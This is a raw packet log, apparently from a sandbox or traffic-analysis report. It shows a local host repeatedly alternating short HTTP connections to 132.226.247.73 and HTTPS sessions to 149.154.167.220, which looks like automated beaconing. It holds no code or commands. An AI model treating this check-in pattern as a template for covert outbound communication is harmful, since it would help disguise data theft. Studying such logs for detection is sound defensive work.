Jan 10, 2025 21:53:37.461230993 CET	443	49924	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:37.974589109 CET	443	49924	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:37.974715948 CET	443	49924	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:37.974814892 CET	49924	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:37.977654934 CET	49924	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:38.163769007 CET	49934	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:38.170182943 CET	80	49934	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:38.170245886 CET	49934	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:38.170341969 CET	49934	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:38.176171064 CET	80	49934	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:38.843408108 CET	80	49934	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:38.844908953 CET	49939	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:38.844943047 CET	443	49939	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:38.845114946 CET	49939	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:38.845427990 CET	49939	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:38.845447063 CET	443	49939	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:38.893677950 CET	49934	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:39.477284908 CET	443	49939	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:39.481842995 CET	49939	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:39.481864929 CET	443	49939	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:39.481925964 CET	49939	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:39.481934071 CET	443	49939	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:39.734565020 CET	443	49939	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:39.734709024 CET	443	49939	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:39.734797001 CET	49939	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:39.735251904 CET	49939	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:39.741650105 CET	49934	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:39.742541075 CET	49948	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:39.746702909 CET	80	49934	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:39.746777058 CET	49934	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:39.747333050 CET	80	49948	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:39.747409105 CET	49948	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:39.747529984 CET	49948	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:39.752311945 CET	80	49948	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:40.454317093 CET	80	49948	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:40.455389977 CET	49952	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:40.455439091 CET	443	49952	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:40.455507994 CET	49952	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:40.455754042 CET	49952	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:40.455769062 CET	443	49952	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:40.503253937 CET	49948	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:41.066945076 CET	443	49952	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:41.068895102 CET	49952	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:41.068939924 CET	443	49952	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:41.069010973 CET	49952	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:41.069021940 CET	443	49952	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:41.381058931 CET	443	49952	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:41.381165981 CET	443	49952	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:41.381218910 CET	49952	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:41.381644011 CET	49952	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:41.385359049 CET	49948	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:41.386703968 CET	49960	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:41.390314102 CET	80	49948	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:41.390367985 CET	49948	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:41.391515017 CET	80	49960	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:41.391572952 CET	49960	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:41.391680956 CET	49960	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:41.396397114 CET	80	49960	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:42.072101116 CET	80	49960	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:42.076809883 CET	49966	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:42.076855898 CET	443	49966	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:42.077054977 CET	49966	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:42.077373028 CET	49966	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:42.077384949 CET	443	49966	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:42.127832890 CET	49960	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:42.704361916 CET	443	49966	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:42.706310987 CET	49966	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:42.706337929 CET	443	49966	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:42.706796885 CET	49966	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:42.706805944 CET	443	49966	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:43.120547056 CET	443	49966	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:43.120626926 CET	443	49966	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:43.120687962 CET	49966	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:43.121130943 CET	49966	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:43.124665976 CET	49960	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:43.125854969 CET	49973	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:43.129611969 CET	80	49960	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:43.129705906 CET	49960	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:43.130660057 CET	80	49973	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:43.130727053 CET	49973	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:43.130877972 CET	49973	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:43.135602951 CET	80	49973	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:43.840277910 CET	80	49973	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:43.841988087 CET	49978	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:43.842035055 CET	443	49978	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:43.842091084 CET	49978	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:43.842405081 CET	49978	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:43.842417955 CET	443	49978	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:43.893440962 CET	49973	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:44.466794014 CET	443	49978	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:44.469036102 CET	49978	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:44.469063997 CET	443	49978	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:44.469144106 CET	49978	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:44.469152927 CET	443	49978	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:44.827553988 CET	443	49978	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:44.827655077 CET	443	49978	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:44.828572989 CET	49978	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:44.828887939 CET	49978	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:44.833556890 CET	49973	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:44.834218979 CET	49986	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:44.838579893 CET	80	49973	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:44.838640928 CET	49973	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:44.838992119 CET	80	49986	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:44.839226961 CET	49986	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:44.839339018 CET	49986	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:44.844089031 CET	80	49986	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:45.540389061 CET	80	49986	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:45.542012930 CET	49992	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:45.542063951 CET	443	49992	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:45.542171001 CET	49992	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:45.542490005 CET	49992	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:45.542511940 CET	443	49992	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:45.596626997 CET	49986	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:46.163392067 CET	443	49992	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:46.165504932 CET	49992	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:46.165518045 CET	443	49992	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:46.165596962 CET	49992	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:46.165604115 CET	443	49992	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:46.523757935 CET	443	49992	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:46.523838997 CET	443	49992	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:46.523895979 CET	49992	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:46.524372101 CET	49992	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:46.528276920 CET	49986	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:46.529659033 CET	49993	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:46.533627987 CET	80	49986	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:46.533720016 CET	49986	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:46.534697056 CET	80	49993	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:46.534780025 CET	49993	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:46.534900904 CET	49993	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:46.539917946 CET	80	49993	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:47.217083931 CET	80	49993	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:47.218673944 CET	49994	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:47.218723059 CET	443	49994	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:47.218791008 CET	49994	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:47.219126940 CET	49994	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:47.219139099 CET	443	49994	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:47.268667936 CET	49993	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:47.897222042 CET	443	49994	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:47.898732901 CET	49994	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:47.898750067 CET	443	49994	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:47.898828030 CET	49994	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:47.898834944 CET	443	49994	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:48.307353973 CET	443	49994	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:48.307467937 CET	443	49994	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:48.307517052 CET	49994	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:48.307917118 CET	49994	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:48.311297894 CET	49993	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:48.312407017 CET	49995	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:48.317182064 CET	80	49995	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:48.317296028 CET	49995	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:48.317394018 CET	49995	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:48.322129965 CET	80	49995	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:48.334060907 CET	80	49993	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:48.334250927 CET	49993	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:49.013741970 CET	80	49995	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:49.015126944 CET	49996	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:49.015162945 CET	443	49996	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:49.015234947 CET	49996	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:49.015502930 CET	49996	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:49.015513897 CET	443	49996	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:49.065320969 CET	49995	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:49.711930990 CET	443	49996	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:49.713690996 CET	49996	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:49.713709116 CET	443	49996	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:49.713793993 CET	49996	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:49.713804007 CET	443	49996	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:50.163014889 CET	443	49996	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:50.163224936 CET	443	49996	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:50.163330078 CET	49996	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:50.168149948 CET	49996	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:50.171228886 CET	49995	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:50.172235966 CET	49997	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:50.177558899 CET	80	49995	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:50.177647114 CET	49995	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:50.178180933 CET	80	49997	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:50.178256989 CET	49997	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:50.178380013 CET	49997	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:50.184278011 CET	80	49997	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:50.853566885 CET	80	49997	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:50.854929924 CET	49998	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:50.854980946 CET	443	49998	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:50.855062008 CET	49998	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:50.855340958 CET	49998	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:50.855359077 CET	443	49998	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:50.909077883 CET	49997	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:51.485387087 CET	443	49998	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:51.486944914 CET	49998	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:51.486974001 CET	443	49998	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:51.487029076 CET	49998	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:51.487036943 CET	443	49998	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:51.745862007 CET	443	49998	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:51.745976925 CET	443	49998	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:51.746170998 CET	49998	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:51.746517897 CET	49998	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:51.749588966 CET	49997	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:51.750591993 CET	49999	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:51.754861116 CET	80	49997	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:51.754949093 CET	49997	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:51.755611897 CET	80	49999	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:51.755788088 CET	49999	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:51.755938053 CET	49999	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:51.761215925 CET	80	49999	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:52.437669039 CET	80	49999	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:52.439241886 CET	50000	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:52.439291954 CET	443	50000	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:52.439366102 CET	50000	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:52.439646006 CET	50000	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:52.439665079 CET	443	50000	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:52.487219095 CET	49999	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:53.070573092 CET	443	50000	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:53.072273016 CET	50000	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:53.072345018 CET	443	50000	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:53.072431087 CET	50000	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:53.072452068 CET	443	50000	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:53.521066904 CET	443	50000	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:53.521178007 CET	443	50000	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:53.521270990 CET	50000	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:53.521718025 CET	50000	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:53.525588036 CET	49999	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:53.526582956 CET	50001	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:53.530819893 CET	80	49999	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:53.530906916 CET	49999	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:53.531450987 CET	80	50001	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:53.531517982 CET	50001	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:53.531601906 CET	50001	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:53.536483049 CET	80	50001	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:54.203829050 CET	80	50001	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:54.205457926 CET	50002	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:54.205566883 CET	443	50002	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:54.205658913 CET	50002	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:54.206005096 CET	50002	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:54.206043959 CET	443	50002	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:54.252804041 CET	50001	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:54.850239038 CET	443	50002	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:54.852559090 CET	50002	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:54.852605104 CET	443	50002	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:54.852674961 CET	50002	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:54.852685928 CET	443	50002	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:55.218569994 CET	443	50002	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:55.218650103 CET	443	50002	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:55.218707085 CET	50002	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:55.219245911 CET	50002	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:55.224512100 CET	50001	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:55.225507021 CET	50003	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:55.229592085 CET	80	50001	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:55.229672909 CET	50001	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:55.230350018 CET	80	50003	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:55.230427027 CET	50003	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:55.230660915 CET	50003	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:55.235487938 CET	80	50003	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:55.926980019 CET	80	50003	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:55.932136059 CET	50004	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:55.932192087 CET	443	50004	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:55.932293892 CET	50004	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:55.932524920 CET	50004	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:55.932543993 CET	443	50004	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:55.971575975 CET	50003	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:56.549375057 CET	443	50004	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:56.551655054 CET	50004	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:56.551688910 CET	443	50004	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:56.551748991 CET	50004	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:56.551762104 CET	443	50004	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:56.900106907 CET	443	50004	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:56.900310993 CET	443	50004	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:56.900676966 CET	50004	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:56.900830984 CET	50004	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:56.903808117 CET	50003	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:56.905050993 CET	50005	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:56.908937931 CET	80	50003	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:56.909051895 CET	50003	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:56.909915924 CET	80	50005	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:56.910007000 CET	50005	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:56.910090923 CET	50005	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:56.914910078 CET	80	50005	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:57.584853888 CET	80	50005	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:57.586363077 CET	50006	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:57.586457968 CET	443	50006	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:57.586577892 CET	50006	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:57.586833000 CET	50006	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:57.586863995 CET	443	50006	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:57.627834082 CET	50005	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:58.232165098 CET	443	50006	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:58.234719992 CET	50006	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:58.234750986 CET	443	50006	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:58.234812021 CET	50006	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:58.234819889 CET	443	50006	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:58.626666069 CET	443	50006	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:58.626766920 CET	443	50006	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:58.627032042 CET	50006	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:58.663338900 CET	50006	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:58.668674946 CET	50005	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:58.670047998 CET	50007	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:58.673928976 CET	80	50005	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:58.674010038 CET	50005	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:58.674938917 CET	80	50007	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:58.675023079 CET	50007	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:58.675137997 CET	50007	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:58.679994106 CET	80	50007	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:59.365570068 CET	80	50007	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:59.366940022 CET	50008	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:59.367041111 CET	443	50008	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:59.367192984 CET	50008	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:59.367477894 CET	50008	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:59.367510080 CET	443	50008	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:59.409250021 CET	50007	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:59.988276005 CET	443	50008	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:59.990334034 CET	50008	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:59.990382910 CET	443	50008	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:59.990473032 CET	50008	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:59.990490913 CET	443	50008	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:00.415334940 CET	443	50008	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:00.415431976 CET	443	50008	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:00.415507078 CET	50008	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:00.415911913 CET	50008	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:00.418806076 CET	50007	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:00.419817924 CET	50009	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:00.423906088 CET	80	50007	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:00.423983097 CET	50007	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:00.424822092 CET	80	50009	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:00.424905062 CET	50009	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:00.425035000 CET	50009	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:00.429872036 CET	80	50009	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:01.100239038 CET	80	50009	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:01.101614952 CET	50010	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:01.101721048 CET	443	50010	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:01.101819992 CET	50010	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:01.102157116 CET	50010	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:01.102195024 CET	443	50010	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:01.143423080 CET	50009	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:01.739675999 CET	443	50010	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:01.743046045 CET	50010	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:01.743113995 CET	443	50010	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:01.743190050 CET	50010	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:01.743211985 CET	443	50010	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:02.010096073 CET	443	50010	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:02.010211945 CET	443	50010	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:02.010303020 CET	50010	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:02.010652065 CET	50010	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:02.013855934 CET	50009	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:02.014884949 CET	50011	80	192.168.2.5	132.226.247.73
